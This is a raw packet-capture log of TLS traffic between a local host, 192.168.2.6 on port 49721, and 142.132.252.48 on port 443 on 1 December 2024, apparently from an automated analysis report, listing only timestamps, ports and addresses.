                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.234617949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.234652996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.242485046 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.242502928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.242687941 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.242687941 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.242698908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.242777109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.243580103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.249459028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.249479055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.249511003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.249521017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.249563932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.249563932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.257381916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.257404089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.257438898 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.257447004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.257473946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.257493973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.265413046 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.265430927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.265489101 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.265502930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.265525103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.265562057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.267112970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.272835970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.272852898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.272921085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.272928953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.272967100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.280898094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.280915976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.280958891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.280967951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.280993938 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.281014919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.308099031 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.323689938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.323709011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.323779106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.323791981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.323837996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.357465029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.435931921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.435954094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.436045885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.436055899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.436145067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.443336964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.443353891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.443414927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.443422079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.443516016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.451251030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.451267958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.451330900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.451338053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.451406002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.459429979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.459449053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.459548950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.459568024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.462236881 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.466234922 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.466252089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.466326952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.466340065 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.466362953 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.466377020 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.474689960 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.474708080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.474760056 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.474781036 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.475008965 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.481672049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.481690884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.481766939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.481775999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.482717037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.497387886 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.509147882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.525691986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.525728941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.525767088 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.525775909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.525835037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.525835037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.547146082 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.637095928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.637116909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.637185097 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.637204885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.637248039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.644964933 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.645013094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.645071030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.645077944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.645121098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.645121098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.653013945 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.653031111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.653107882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.653115034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.653178930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.659980059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.660000086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.660075903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.660083055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.660159111 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.667898893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.667915106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.667956114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.667963028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.667987108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.668025970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.675456047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.675471067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.675595045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.675611019 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.675717115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.683413982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.683428049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.683470964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.683485985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.683540106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.684294939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.726331949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.726350069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.726440907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.726454973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.726521015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.733901024 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.840120077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.840140104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.840223074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.840229988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.840269089 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.847651005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.847671986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.847718000 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.847726107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.847774029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.847774029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.855648994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.855664968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.855716944 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.855729103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.855818033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.862699986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.862715006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.862881899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.862889051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.862934113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.869707108 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.869741917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.869797945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.869797945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.869807005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.870320082 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.877064943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.877094030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.877145052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.877151966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.877183914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.877198935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.886480093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.886496067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.886622906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.886634111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.886955976 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.929229021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.929248095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.929317951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.929331064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:33.930701017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.039798975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.039818048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.039899111 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.039906979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.040051937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.047795057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.047811031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.047866106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.047873020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.047928095 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.054791927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.054806948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.054857969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.054864883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.054933071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.063544989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.063559055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.063613892 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.063621044 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.063699961 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.070780993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.070795059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.070868015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.070874929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.070952892 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.078257084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.078274965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.078349113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.078366041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.078444004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.086240053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.086256981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.086369038 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.086380959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.086453915 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.088697910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.129430056 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.129446983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.129522085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.129537106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.129623890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.241457939 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.241477966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.241584063 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.241591930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.241792917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.255060911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.255079031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.255163908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.255171061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.255244970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.265954018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.265974045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.266048908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.266056061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.266721964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.267494917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.267509937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.267564058 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.267570972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.271198034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.272624016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.272640944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.272721052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.272727013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.274693966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.279527903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.279546976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.279618979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.279624939 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.282888889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.287067890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.287089109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.287153959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.287161112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.291012049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.351826906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.351855993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.351994991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.352004051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.352082968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.442775965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.442801952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.442858934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.442867994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.442899942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.442899942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.450366020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.450386047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.450476885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.450476885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.450484991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.450535059 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.458343029 CET44349721142.132.252.48192.168.2.6
